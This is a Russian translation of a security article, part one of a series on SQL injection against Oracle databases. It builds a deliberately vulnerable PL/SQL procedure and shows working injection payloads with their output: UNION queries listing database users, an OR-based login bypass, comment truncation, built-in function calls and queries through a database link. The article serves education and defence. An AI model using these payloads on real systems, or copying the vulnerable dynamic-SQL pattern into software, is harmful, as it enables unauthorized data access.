28.01.2003

SQL инъекция и ORACLE, часть первая

Методы SQL инъекции в последнее время представляют опасную угрозу защите информации, хранящейся в базах данных Oracle. Хотя написано множество статей об SQL инъекции, тем не менее, очень редко описываются особенности их использования против базы данных ORACLE. В этой статье мы исследуем нападения SQL инъекции против базы данных ORACLE. Цель этой статьи состоит в том, чтобы объяснить пользователям ORACLE опасность SQL инъекции и предложить простые способы защиты против этого типа нападений.

securityfocus.com

Методы SQL инъекции в последнее время представляют опасную угрозу защите информации, хранящейся в базах данных Oracle. Хотя написано множество статей об SQL инъекции, тем не менее, очень редко описываются особенности их использования против базы данных ORACLE. В этой статье мы исследуем нападения SQL инъекции против базы данных ORACLE. Цель этой статьи состоит в том, чтобы объяснить пользователям ORACLE опасность SQL инъекции  и предложить простые способы защиты против этого типа нападений.

Что такое SQL инъекция

SQL инъекция – способ нападения на базу данных в обход межсетевой защиты. В этом методе,  параметры, передаваемые к базе данных через Web приложения, изменяются таким образом,  чтобы изменить выполняемый SQL запрос. Например, добавляя символ (‘) к параметру, можно выполнить дополнительный запрос совместно с первым.

Нападение может использоваться для следующих целей

  1. Получить доступ к данным, которые обычно недоступны или получить данные конфигурации системы, которые могут использоваться для дальнейших нападений. Например, измененный запрос может возвратить хешированные пароли пользователей, которые в последствии могут быть расшифрованы методом грубой силы.
  2. Получить доступ к компьютерам организации, через компьютер, на котором хостится база данных. Это можно реализовать, используя процедуры базы данных и расширения 3GL языка, которые позволяют доступ к операционной системе.

Существует несколько способов использовать эти методы на системе ORACLE, в зависимости от используемого языка или API. Ниже представлены некоторые языки, API и инструменты, которые могут получить доступ к базе данных ORACLE и могут быть частью Web приложения:

  • JSP
  • ASP
  • XML, XSL и XSQL
  • Javascript
  • VB, MFC, и другие ODBC основанные утилиты и API
  • Различные Web приложения
  • 3 и 4GL языки, типа Си, OCI, Pro*C и Cobol
  • Perl и CGI сценарии, имеющие доступ к базе данных

Любое из вышеупомянутых приложений, инструментов и программ может использоваться как основа для изменения SQL запроса базы данных ORACLE. Для этого должны выполнятся несколько простейших условий, главное из которых состоит в том, что в вышеупомянутых средствах должен использоваться динамический SQL, так как в противном случае  SQL инъекция невозможна.

Также важно упомянуть, что SQL инъекция против любой базы данных, включая ORACLE, может использоваться не только через Web приложения.  Любое приложение,  позволяющее пользователю вводить данные, которые могут быть частью динамического SQL запроса, может быть потенциально уязвимо к нападениям SQL инъекции. Очевидно, что Web приложения представляют наибольшую угрозу, поскольку любой пользователь с браузером и доступом к Интернет может потенциально обратиться к чувствительным данным.

Во второй части статьи более подробно обсуждаются методы защиты против нападений SQL инъекции, но есть несколько моментов, о которых необходимо упомянуть в этом вводном разделе. Данные, хранящиеся в базе данных ORACLE, должны быть защищены от пользователей,  которые имеют доступ к сети и приложениям, обслуживающим эти данные. Администраторы базы данных должны понимать, что большинство угроз данным, хранящимся в базе данных, исходит от авторизованных пользователей.

Защита от SQL инъекции на ORACLE системах в принципе проста и включает две основные стадии:

  1. Ревизия кода приложений и устранение проблем, которые могут способствовать  SQL инъекции (более подробно эти проблемы будут обсуждены во второй части статьи).
  2. Использование принципа наименьшего количества привилегий на уровне базы данных так, чтобы даже если кто-то смог изменить SQL запрос, он не смог бы получить больше информации, чем бы он мог получить через предназначенный для этого интерфейс приложения.

Во второй части статьи мы обсудим подробности как эти пункты можно применить к ORACLE приложениям.

Эксплуатация ORACLE

Oracle, подобно другим базам данных, уязвим к нападениям SQL инъекции. Следующие неправильные обращения могут использоваться против базы данных ORACLE:

  • UNION можно добавить к SQL инструкции, чтобы выполнить вторую инструкцию;
  • SUBSELECTS можно добавить к существующим инструкциям;
  • Существующий SQL запрос может использовать обходные пути, чтобы возвратить все данные. Эта методика часто используется, чтобы получить доступ через опознавательные схемы, осуществленные другими программами;
  • Доступен большой выбор установленных пакетов и процедур, которые могут использоваться для чтения и записи файлов на операционной системе;
  • Data Definition Language (DDL) может эксплуатироваться, если  он используется в динамической SQL строке;
  • Могут быть внедрены INSERT, UPDATE и DELETE.

С другой стороны, в ORACLE невозможно использовать следующие методы, присущие другим базам данных:

  • Не могут использоваться множественные инструкции;
  • SQL инъекция невозможна, когда запрос использует присвоенные переменные;

Некоторые специфические примеры

Web приложения наиболее уязвимы к нападениям SQL инъекции. Они могут быть написаны, используя ASP, JSP или другие вышеупомянутые языки. Можно сказать, что SQL инъекция это не проблема базы данных, а проблема неправильно написанного Web приложения.

Чтобы проиллюстрировать некоторые из возможностей SQL инъекции на Oracle, я написал простую процедуру PL/SQL, которая отображает телефонный номер клиентов из гипотетической таблицы клиента в базе данных. Как я уже говорил, можно изменить любую часть SQL запроса, который динамически сформирован во время выполнения и в котором входные данные предварительно не проверены.   Чтобы продемонстрировать SQL инъекцию, можно использовать PL/SQL и вездесущий инструмент SQL*Plus . Процедура использует динамический SQL, чтобы передать часть SQL к базе данных. Использование PL/SQL  процедуры и динамического SQL во всех отношениях идентично SQL инъекции через Web интерфейс, за исключением того, что в нашем примере мы эксплуатируем уязвимость локально, а не удаленно, поэтому читатель должен держать это в уме при прочитывании этой статьи. Также, из-за этого подхода мы не используем никаких методов символьного кодирования, чтобы передать специальные символы или метасимволы на сервер базы данных от Web-браузера. Пример используемой структуры таблицы:

SQL> desc customers
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 CUSTOMER_FORNAME                                   VARCHAR2(30)
 CUSTOMER_SURNAME                                   VARCHAR2(30)
 CUSTOMER_PHONE                                     VARCHAR2(30)
 CUSTOMER_FAX                                       VARCHAR2(30)
 CUSTOMER_TYPE                                        NUMBER(10)

Таблица была загружена следующим образом:

SQL> select * from customers;

CUSTOMER_FORNAME               CUSTOMER_SURNAME
------------------------------ ------------------------------
CUSTOMER_PHONE                 CUSTOMER_FAX                   CUSTOMER_TYPE
------------------------------ ------------------------------ -------------
Fred                           Clark
999444888                      999444889                                  3

Bill                           Jones
999555888                      999555889                                  2

Jim                            Clark
999777888                      999777889                                  1

Типовая используемая процедура создана со следующим кодом. Для этих испытаний я использовал гипотетического пользователя DBSNMP, который имеет больше привилегий, чем необходимо для обычного пользователя. Этот пользователь иллюстрирует проблему Web пользователей, ограничиваемых наименьшим количеством привилегий:

create or replace procedure get_cust (lv_surname in varchar2)
is
        type cv_typ is ref cursor;
        cv cv_typ;
        lv_phone        customers.customer_phone%type;
        lv_stmt         varchar2(32767):='select customer_phone '||
                                        'from customers '||
                                        'where customer_surname='''||
                                        lv_surname||'''';
begin
        dbms_output.put_line('debug:'||lv_stmt);
        open cv for lv_stmt;
        loop
                fetch cv into lv_phone;
                exit when cv%notfound;
                dbms_output.put_line('::'||lv_phone);
        end loop;
        close cv;
end get_cust;
/

Невозможно просто добавить другую инструкцию в существующую инструкцию, сформированную процедурой для выполнения, как, например, в MS SQL. Посмотрим, что произойдет с нашей процедурой в этом случае:

SQL> exec get_cust('x'' select username from all_users where ' 'x' '=’ 'x');
debug:select customer_phone from customers where customer_surname='x' select
username from all_users where 'x'='x'
-933ORA-00933: SQL command not properly ended

Процедура ожидает фамилию клиента и должна формировать инструкцию формы:

select customer_phone from customers where customer_surname='Jones'

Как видно, можно добавить дополнительный SQL после имени,  изменяющий существующий SQL запрос, используя кавычки. В предыдущем примере, ORACLE возвращает ошибку, если мы посылаем две SQL инструкции сразу к RDBMS. Инструкции в ORACLE разграничены точкой с запятой (;), т.е. мы можем попробовать следующее:

SQL> exec get_cust('x'';select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x';select
username from all_users where 'x'='x'
-911ORA-00911: invalid character

ORACLE снова возвратил ошибку. Добавление точки с запятой после первой инструкции не позволяет выполнить вторую инструкцию, так что единственный способ заставить ORACLE выполнить дополнительный SQL запрос состоит в том, чтобы расширить существующее ‘where’ или использовать union или subselect. Следующий пример демонстрирует, как получить дополнительные данные из другой таблицы. В этом случае, мы прочитаем список пользователей в базе данных из таблицы ALL_USERS.

SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select username from all_users where 'x'='x'
::AURORA$JIS$UTILITY$
::AURORA$ORB$UNAUTHENTICATED
::CTXSYS
::DBSNMP
::MDSYS
::ORDPLUGINS
::ORDSYS
::OSE$HTTP$ADMIN
::OUTLN
::SYS
::SYSTEM
::TRACESVR  

Мы также можем использовать подзапросы, чтобы расширить существующую инструкцию SELECT. Такое изменение не может принести много пользы, поскольку SELECT не может использоваться для добавления новых столбцов в других таблицах; однако, в этом случае мы можем изменить записи, возвращенные существующим запросом. Следующий пример возвращает все  записи в таблице:

Дополнительное “ и ‘x’=’x’” необходимо, что бы закрыть первоначальную кавычку. Вышеупомянутый пример возвращает все записи  в нашей типовой таблице.

В следующем примере мы рассмотрим способ усечения SQL запроса до оператора WHERE так, чтобы были возвращены все записи таблице. Типичный пример эксплуатации - Web приложения, использующие способ идентификации при входе в систему, в котором ищется запись в таблице пользователей, которой соответствует введенное имя пользователя и пароль.  Например:

select * from appusers where username=’someuser’ and password=’somecleverpassword’
SQL> exec get_cust('x'' or exists (select 1 from sys.dual) and ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' or exists
(select 1 from sys.dual) and 'x'='x'
::999444888
::999555888
::999777888  

Усекая запрос, мы можем заставить SQL возвратить все записи в таблице. Это позволит войти в систему, да еще и предварительно возвратит учетную запись администратора! Ниже – пример усечения нашей типовой таблицы  клиентов.  Все записи могут быть возвращены, используя “OR ‘x’=’x’” в ‘where’ следующим способом:

SQL> exec get_cust('x'' or ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' or 'x'='x'
::999444888
::999555888
::999777888

Затем, изменим  процедуру, чтобы расширить используемый SQL таким образом, чтобы была усечена вторая часть выражения после ‘WHERE’. Сначала рассмотрим пример изменяемой процедуры:

create or replace procedure get_cust2 (lv_surname in varchar2)
is
        type cv_typ is ref cursor;
        cv cv_typ;
        lv_phone        customers.customer_phone%type;
        lv_stmt         varchar2(32767):='select customer_phone '||
                                'from customers '||
                                'where customer_surname='''||
                                lv_surname||''' and customer_type=1';
begin
        dbms_output.put_line('debug:'||lv_stmt);
        open cv for lv_stmt;
        loop
                fetch cv into lv_phone;
                exit when cv%notfound;
                dbms_output.put_line('::'||lv_phone);
        end loop;
        close cv;
exception
        when others then
                dbms_output.put_line(sqlcode||sqlerrm);
end get_cust2;

Мы будем использовать символы комментария “- -“, чтобы усечь SQL после оператора ‘WHERE’. Этот метод полезен в случае, когда приложение использует более одного поля, которое добавляется  к динамическому SQL запросу и передается к базе данных. Чтобы упростить добавление дополнительного SQL и обойти все поля, мы можем добавить “- -“ в запись, которую мы считаем первым полем и внедрить наш SQL запрос. Пример:

SQL> exec get_cust2('x'' or ''x''=''x'' --');
debug:select customer_phone from customers where customer_surname='x' or 'x'='x'
--' and customer_type=1
::999444888
::999555888
::999777888  

Выполняя, мы видим, что возвращены все три записи из-за инструкции “or”. Если там не было бы комментария, то выполняемый SQL запрос все еще содержал бы строку “and customer_type=1”.  Можно также использовать union и select на таблице all_users и затем прокомментировать остальную часть после оператора ‘WHERE’.

Все приведенные выше примеры показывают, как можно внедрить дополнительный SQL в оператор ‘select’. Те же самые принципы могут использоваться в операторах update, insert и delete. Другие операторы, доступные в Oracle, включают DDL (Data Definition Language) операторы, которые позволяют изменить логическую структуру базы данных. Например, с помощью DDL, можно создать таблицу или изменить используемый язык.  Часто приложения позволяют посылать любой SQL запрос к серверу.  Это плохой способ программирования, поскольку  позволяет выполнять операторы типа DDL.  Можно утверждать, что рассматриваемый случай не является SQL инъекцией, потому что может быть выполнен любой SQL, без изменения существующего SQL запроса.

В заключении мы рассмотрим проблемы в модулях, процедурах и функциях. Можно вызвать PL/SQL функцию из SQL инструкции. Существуют более тысячи встроенных функций и процедур, поставляемых со стандартными пакетами. Обычно они запускаются с DBMS (database management system) или UTL. Заголовки этих процедур могут быть найдены в $ORACLE_HOME/rdbms/admin. Также список процедур и функций может быть получен следующим запросом:

SQL> col owner for a15
SQL> col object_type for a30
SQL> col object_name for a30
SQL> select owner,object_type,object_name
  2  from dba_objects
  3  where object_type in('PACKAGE','FUNCTION','PROCEDURE');

OWNER           OBJECT_TYPE                    OBJECT_NAME
--------------- ------------------------------ ------------------------------
SYS             FUNCTION                       CLIENT_IP_ADDRESS
SYS             FUNCTION                       DATABASE_NAME
SYS             FUNCTION                       DBJ_LONG_NAME
SYS             FUNCTION                       DBJ_SHORT_NAME
SYS             PACKAGE                        DBMSOBJG
…
CTXSYS          PACKAGE                        DR_DEF
CTXSYS          PROCEDURE                      SYNCRN

391 rows selected.

Ниже приведен пример, который вызывает встроенную функцию. Функция SYS.LOGIN_USER возвращает имя вошедшего пользователя:

SQL> exec get_cust('x'' union select sys.login_user from sys.dual where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select sys.login_user from sys.dual where 'x'='x'
::DBSNMP

Функции или процедуры, которые могут быть вызваны с SQL, сильно ограничены: функция не должна изменять состояние базы данных или состояние пакета, если она вызвана удаленно, и функция не может изменить переменные пакета, если она вызвана в операторе ‘WHERE’ или группе операторов. В версиях более ранних, чем  Oracle 8, очень немного встроенных функций или процедур можно вызвать из PL/SQL функции, которая вызывается из SQL инструкции. Эти ограничения несколько сняты в Oracle 8, но пользователи все равно не способны вызывать пакеты file или output типов, типа UTL_FILE или DBMS_OUTPUT или DBMS_LOB непосредственно из SQL инструкций, поскольку они должны выполняться в PL/SQL блоке или вызываться выполняющей командой из SQL*Plus. Можно использовать процедуры, являющиеся частью функции, которая предназначена для вызова из SQL запроса.

Если форма или приложение формируют и выполняют динамический PL/SQL тем же самым способом, как описано выше, могут использоваться те же самые методы, чтобы вставить запросы к стандартным PL/SQL пакетам на любых PL/SQL пакетах или функциях, которые существуют в логической структуре базы данных.

Если в атакуемой базе данных существуют ссылки к другим базам данных, эти базы могут также использоваться в попытках SQL инъекции. Это позволяет выполнять нападения через межсетевую защиту к базе данных, которая недоступна через Интернет. Ниже простой пример, который использует нашу  PL/SQL процедуру, чтобы прочитать системную дату из другой базы данных в сети:

SQL> exec get_cust('x'' union select to_char(sysdate) from sys.dual@plsq where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select to_char(sysdate) from sys.dual@plsq where 'x'='x'
::13-NOV-02

Заключение

В первой части статьи мы предложили краткий обзор SQL инъекции и привели несколько примеров того, как эта методика может использоваться против баз данных Oracle. В следующей статье мы рассмотрим способы обнаружения SQL инъекции и обсудим методы защиты.

или введите имя

CAPTCHA